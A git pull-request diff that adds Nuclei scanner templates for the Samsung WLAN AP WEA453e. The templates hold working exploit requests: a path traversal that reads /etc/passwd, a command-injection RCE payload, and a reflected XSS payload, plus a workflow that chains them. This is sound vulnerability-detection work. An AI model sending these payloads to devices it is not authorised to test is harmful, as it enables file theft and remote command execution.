Merge pull request #865 from pikpikcu/patch-65

Create samsung-wlan-ap-lfi
2021-02-15 21:30:15 +05:30 · 2021-02-15 21:30:15 +05:30 · 4ffeafe952
parent eb50c32a64 55b6b33e93
commit 4ffeafe952
4 changed files with 92 additions and 0 deletions
--- a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
@ -0,0 +1,24 @@
+id: samsung-wlan-ap-lfi
+
+info:
+  name: Samsung Wlan AP (WEA453e) LFI
+  author: pikpikcu
+  severity: critical
+  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+  tags: xss,samsung,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/(download)/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+          - "bin:[x]:1:1"
+        part: body
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
@ -0,0 +1,25 @@
+id: samsung-wlan-ap-rce
+
+info:
+  name: Samsung Wlan AP (WEA453e) RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+  tags: xss,samsung,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/(download)/tmp/poc.txt"
+    body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+          - "bin:[x]:1:1"
+        part: body
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
@ -0,0 +1,28 @@
+id: samsung-wlan-ap-xss
+
+info:
+  name: Samsung Wlan AP (WEA453e) XSS
+  author: pikpikcu
+  severity: medium
+  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+  tags: xss,samsung,xss
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "/tmp/www/<script>alert(document.domain)</script>"
+        part: body
+
+      - type: status
+        status:
+          - 404
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
--- a/workflows/samsung-wlan-ap-workflow.yaml
+++ b/workflows/samsung-wlan-ap-workflow.yaml
@ -0,0 +1,15 @@
+id: samsung-wlan-ap-workflow
+
+info:
+  name: Samsung Wlan AP (WEA453e) Checks
+  author: pikpikcu
+  description: A simple workflow that runs all samsung WlanAP related nuclei templates on a given target.
+
+workflows:
+
+  - template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
+
+    subtemplates:
+      - template: vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
+      - template: vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
+      - template: vulnerabilities/samsung/samsung-wlan-ap-xss.yaml